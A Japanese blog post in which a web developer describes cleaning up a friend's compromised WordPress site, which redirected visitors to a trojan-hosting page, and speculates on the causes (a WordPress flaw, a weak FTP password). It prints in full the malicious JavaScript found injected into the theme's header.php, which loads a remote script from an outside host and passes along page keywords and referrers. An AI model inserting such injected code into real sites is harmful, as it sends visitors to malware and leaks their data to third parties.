トロイの木馬 @WordPress

同業者友人から、「サーバーを移動させたい」と、連絡が。

URLを開いてみると、

トロイの木馬の脅威

 

またか・・・

 

「またか」というのは、実は、今回3回目
前回は、踏み台にされて、メール送信されたとかで、
アカウント停止を食らった、今回と同じハッキングされた系。

***

リダイレクトがかかって、
トロイの木馬が埋め込まれているサイトに飛ばされるます

時計メーカーのサイトなので、わりと質が悪い・・・

.

ウィルスソフトを入れてなかったら、感染するんでしょうね??

長期に渡り、踏み台にされ、
最後は、銀行からお金を抜き取られる始末

 

ハッキングされた原因

  • WordPressの是弱性を狙われたのか、
  • FTPのパスワードがカンタン

が、原因だと思われます。

でも、普通にFTPで書き換えられたのなら、
ファイルの日付が更新されるはずなんですが、

日付が変わってない!!

 

つまり、サーバーに侵入されたたとしか、考えられない状況!

***

今回、改ざんされたサーバーは、lolipopですが、
2016年はじめ、ログイン先やIDなどが、一斉に変更になりました。

古いサーバーからの移行だと思っていたのですが、
どうもそれだけではなかった
と、思う今日このごろです。

 

原因は、テンプレート内のheader.php内にjavascriptが追加されていました。

  • php > header / locate
  • javascript > eval

などで、あたりをつけたのですが、該当せず、
jqueryの文字を含む外部リンクでしたが、

<!--script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://181804.webhosting58.1blu.de/js/jquery.min.php?c_utt=I92930&c_utm='+encodeURIComponent('http://181804.webhosting58.1blu.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}

コメントアウトしてみたところ、ビンゴ!!

***

以前直してあげたサイトは、
その後、何も言ってこないので、

とりあえず、パスワード変えて、様子見。

 

トロイの木馬 @WordPress